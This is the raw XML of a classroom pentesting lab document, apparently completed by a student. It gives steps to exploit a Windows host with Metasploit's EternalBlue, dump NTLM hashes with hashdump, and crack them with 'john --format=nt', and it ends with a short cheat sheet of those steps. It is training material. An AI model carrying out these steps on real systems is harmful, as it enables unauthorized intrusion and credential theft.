    <w:p w14:paraId="52AEDFAB" w14:textId="77777777" w:rsidR="00285168" w:rsidRDefault="00285168" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="220368D2" wp14:editId="77D8FBEE">
            <wp:extent cx="5943600" cy="1393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sf_copy_hash.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393190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C78C8C" w14:textId="77777777" w:rsidR="00285168" w:rsidRDefault="00285168" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you have copied the information go to a new terminal window and create a new file with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>gedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1767A024" w14:textId="77777777" w:rsidR="00285168" w:rsidRDefault="00285168" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D775147" w14:textId="77777777" w:rsidR="00285168" w:rsidRDefault="00285168" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Right click to paste the windows credentials, save, and close the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65760694" w14:textId="77777777" w:rsidR="00285168" w:rsidRDefault="00285168" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A45C9C7" wp14:editId="074B4CF6">
            <wp:extent cx="4325510" cy="64004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dit_hashes.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm flipV="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="4369269" cy="646521"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE74A48" w14:textId="77777777" w:rsidR="00285168" w:rsidRDefault="00285168" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Once this file is closed you can return to your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> window and use the command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>quit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> twice, once to quit the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r w:rsidR="00764044">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">and once to quite </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00764044">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00764044">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7319A949" w14:textId="77777777" w:rsidR="00764044" w:rsidRDefault="00764044" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">John is a password cracker with several capabilities.  You will use the default configuration which attempts to crack the passwords, first through a dictionary attack and then through a brute force effort.  During some </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>pentests</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> you may choose to build your own dictionary based on words you related to the company (product names, users, mascots, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) you find during your opensource collection.  The default dictionary is based on common passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A803C8C" w14:textId="77777777" w:rsidR="00764044" w:rsidRDefault="00764044" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>You can attempt to crack the passwords in the target file with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649F9768" w14:textId="77777777" w:rsidR="00764044" w:rsidRDefault="00764044" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>john hashes.txt --format=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="598054BC" w14:textId="77777777" w:rsidR="00764044" w:rsidRDefault="00764044" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The option format=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> is telling john to try a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ntlm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash for the crack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3F95FA" w14:textId="77777777" w:rsidR="00764044" w:rsidRDefault="00764044" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DE82467" wp14:editId="78942906">
            <wp:extent cx="4102873" cy="7887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h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6065" cy="793200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41695DF4" w14:textId="77777777" w:rsidR="00764044" w:rsidRDefault="00764044" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>As john runs it will return usernames and the associated passwords as it runs.  This technique will not always be successful but it’s a good one to try.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02463415" w14:textId="62C2B7AF" w:rsidR="00764044" w:rsidRDefault="00764044" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Provide a screenshot of the usernames and passwords you found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D9AED" w14:textId="60A2B3D7" w:rsidR="001C0DA0" w:rsidRDefault="001C0DA0" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CDA2588" wp14:editId="55F0E00E">
            <wp:extent cx="3800723" cy="2847294"/>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57701" cy="2889979"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A48C652" w14:textId="14D0552D" w:rsidR="00764044" w:rsidRDefault="00764044" w:rsidP="003F5624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Write a short checklist of the steps you used during this lab to retrieve and crack passwords.  Write it as a cheat sheet you could use on a future </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17605BE4" w14:textId="24F6517A" w:rsidR="001C0DA0" w:rsidRPr="001C0DA0" w:rsidRDefault="001C0DA0" w:rsidP="001C0DA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C0DA0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Determine IP of host computer and target computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A07CF4" w14:textId="13179DCF" w:rsidR="001C0DA0" w:rsidRPr="001C0DA0" w:rsidRDefault="001C0DA0" w:rsidP="001C0DA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C0DA0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Start Metasploit and find a vulnerability such as eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0DCB92" w14:textId="1D7CCBBD" w:rsidR="001C0DA0" w:rsidRPr="001C0DA0" w:rsidRDefault="001C0DA0" w:rsidP="001C0DA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C0DA0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Set RHOST to target IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A0E115" w14:textId="016F3952" w:rsidR="001C0DA0" w:rsidRPr="001C0DA0" w:rsidRDefault="001C0DA0" w:rsidP="001C0DA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C0DA0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Set LHOST to host IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F6AFDF" w14:textId="00E99A4E" w:rsidR="001C0DA0" w:rsidRPr="001C0DA0" w:rsidRDefault="001C0DA0" w:rsidP="001C0DA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C0DA0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit the vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD15823" w14:textId="338DDDEE" w:rsidR="001C0DA0" w:rsidRPr="001C0DA0" w:rsidRDefault="001C0DA0" w:rsidP="001C0DA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C0DA0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>If successful, get the hashes using hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6487D145" w14:textId="5EAA1C81" w:rsidR="001C0DA0" w:rsidRPr="001C0DA0" w:rsidRDefault="001C0DA0" w:rsidP="001C0DA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C0DA0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Use those hashes to crack the passwords which can be done using software such as jack the ripper</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001C0DA0" w:rsidRPr="001C0DA0" w:rsidSect="00AB13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1A0FF4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52C4B03E"/>
    <w:lvl w:ilvl="0" w:tplc="1D9C68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65964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F5624"/>
    <w:rsid w:val="001C0DA0"/>
    <w:rsid w:val="001E5185"/>
    <w:rsid w:val="00227773"/>
    <w:rsid w:val="00251C68"/>
    <w:rsid w:val="00285168"/>
    <w:rsid w:val="002B03EA"/>
    <w:rsid w:val="002B74DA"/>
    <w:rsid w:val="002E4669"/>
    <w:rsid w:val="00346543"/>
    <w:rsid w:val="003B3643"/>
    <w:rsid w:val="003F5624"/>
    <w:rsid w:val="00413C76"/>
    <w:rsid w:val="005D427E"/>
    <w:rsid w:val="006077E3"/>
    <w:rsid w:val="006567DC"/>
    <w:rsid w:val="006C1476"/>
    <w:rsid w:val="006E182F"/>
    <w:rsid w:val="00714651"/>
    <w:rsid w:val="00714C21"/>
    <w:rsid w:val="00747867"/>
    <w:rsid w:val="00764044"/>
    <w:rsid w:val="007E5BB0"/>
    <w:rsid w:val="008020BC"/>
    <w:rsid w:val="0084543C"/>
    <w:rsid w:val="00863D62"/>
    <w:rsid w:val="008F7F78"/>
    <w:rsid w:val="00927610"/>
    <w:rsid w:val="009312D5"/>
    <w:rsid w:val="009735C5"/>
    <w:rsid w:val="009C3E17"/>
    <w:rsid w:val="00A25F2E"/>
    <w:rsid w:val="00AB13BD"/>
    <w:rsid w:val="00AC3915"/>
    <w:rsid w:val="00AD56CE"/>
    <w:rsid w:val="00CB075C"/>
    <w:rsid w:val="00CF25F6"/>
    <w:rsid w:val="00D36F79"/>
    <w:rsid w:val="00E36FB2"/>
    <w:rsid w:val="00E601C3"/>
    <w:rsid w:val="00E97C89"/>
    <w:rsid w:val="00EA693A"/>
    <w:rsid w:val="00EF2803"/>
    <w:rsid w:val="00F636FE"/>
    <w:rsid w:val="00F75B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CBE97"/>
  <w15:docId w15:val="{6D100FC7-9B77-45E3-B8C9-6F99E1320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D56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56CE"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="002B03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2B03EA"/>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1C0D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601</TotalTime>
  <Pages>8</Pages>
  <Words>1218</Words>
  <Characters>6948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Douglas Rausch</dc:creator>
  <cp:lastModifiedBy>Tylor Underwood</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-06T20:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-01T16:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>